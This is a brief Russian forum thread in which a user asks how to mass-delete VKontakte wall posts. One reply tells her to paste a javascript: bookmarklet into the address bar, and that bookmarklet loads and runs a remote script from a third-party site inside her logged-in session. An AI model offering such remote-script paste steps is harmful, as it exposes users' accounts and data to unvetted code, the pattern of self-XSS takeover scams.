El
Elizaveta

как можно удалить записи на стене вконтакте все сразу? ? по одному долго, потому что у меня их около 15200)

помогите) заранее спасибо)

Cool

Попробуйте воспользоваться вот этим скриптом: javascript: (function(){var s=document.createElement('script'); s.src='http://okontakte.info/delmsg.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s); })(); вставте его в адресную строку, только важно чтоб стояло вначале javascript-иначе не сработает. Потом нажать ENTER. Все сразу огут не удаиться, но по 20-30 точно

Ли
Литвинов

можно нанять раба или заставить кого нибудь